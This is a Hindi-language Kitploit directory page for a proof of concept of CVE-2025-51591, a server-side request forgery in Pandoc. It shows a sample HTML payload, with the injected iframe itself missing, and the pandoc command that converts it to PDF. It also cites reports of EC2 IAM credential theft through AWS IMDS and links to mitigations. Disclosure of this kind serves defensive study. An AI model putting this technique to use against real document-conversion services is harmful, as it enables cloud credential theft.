Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-51591-Pandoc-SSRF-POC — CVE-2025-51591 Pandoc SSRF vulnerability Proof of Concept | Kitploit
उपकरण/GitHubGitHub/malayke/cve-2025-51591-pandoc-ssrf-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmalayke/cve-2025-51591-pandoc-ssrf-poc

CVE-2025-51591-Pandoc-SSRF-POC

CVE-2025-51591 Pandoc SSRF vulnerability Proof of Concept

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
110 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-51591 Pandoc SSRF POC

image

JGM Pandoc v3.6.4 में एक सर्वर-साइड अनुरोध जालसाजी (SSRF) हमलावरों को एक क्राफ्टेड iframe इंजेक्ट करके पूरे बुनियादी ढांचे तक पहुंच प्राप्त करने और उससे समझौता करने की अनुमति देती है।

Pandoc स्थापित करें

  • https://pandoc.org/installing.html

पेलोड उदाहरण

⚠️ iframe URL को अपने स्वयं के OAST URL से बदलें। ⚠️

root@kitploit:~
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    
</body>

</html>

Pandoc का उपयोग करके पेलोड को PDF में बदलें

root@kitploit:~
pandoc payload.html -o output1.pdf
image

शमन रणनीतियाँ

  • https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
  • https://pandoc.org/MANUAL.html#a-note-on-security

संदर्भ

  • हैकर्स ने Pandoc CVE-2025-51591 का शोषण कर AWS IMDS को निशाना बनाया और EC2 IAM क्रेडेंशियल चुराए
  • IMDS का दुरुपयोग: दुर्लभ व्यवहारों की खोज कर शोषण का पता लगाना
  • उपयोगकर्ता-नियंत्रित HTML से PDF जनरेट करते समय SSRF
टूल डाउनलोड करें